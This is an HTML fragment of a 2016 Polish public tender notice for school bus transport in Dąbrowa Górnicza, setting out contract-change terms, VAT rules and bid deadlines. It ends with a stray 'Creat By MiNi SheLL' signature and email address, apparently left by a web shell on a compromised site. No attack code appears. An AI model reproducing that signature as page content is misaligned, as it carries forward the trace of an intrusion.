    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia:  
a) zmiany trasy i jej długości spowodowanej przyczynami niezależnymi od Zamawiającego i Wykonawcy (np. objazdy, większa liczba przystanków, zmiany miejsc zamieszkania uczniów, zmiana ilości uczniów, itp.) strony, aneksem do umowy, ustalają długość trasy i czasokres zmian w trybie art. 144 ustawy, przy czym maksymalna nominalna wartość umowy nie może ulec zwiększeniu.
b) siły wyższej. Siła wyższa oznacza wydarzenie  nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość 
wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć.
W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności zmiany stawki podatku VAT:
a) w przypadku zwiększenia stawki podatku VAT - ceny jednostkowe brutto nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy;
b) w przypadku zmniejszenia stawki podatku VAT - ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zs4-dg.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół nr 4 im. Królowej Jadwigi w Dąbrowie Górniczej, ul. Łęknice 35, 41-303 Dąbrowa Górnicza, parter, pok. B-5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2016 godzina 10:00, miejsce: Zespół Szkół nr 4 im. Królowej Jadwigi w Dąbrowie Górniczej, ul. Łęknice 35, 41-303 Dąbrowa Górnicza, parter, pok. B-5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest finansowane ze środków Unii Europejskiej. Cenę oferty należy określić w wysokości brutto, jak również należy podać kwotę należnego podatku VAT - dotyczy ceny za 1 kilometr. Wartość zamówienia stanowiąca cenę ofertową winna uwzględniać założone przez Wykonawcę realne wskaźniki wzrostu cen. Koszt kilometrów dojazdowych oraz opiekuna należy uwzględnić w cenie oferty. Zamówienie będzie realizowane do wartości nominalnej brutto ustalonej w umowie. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej. Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający dopuszcza udział podwykonawców w realizacji przedmiotu zamówienia. Zamawiający nie wymaga wniesienia wadium. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com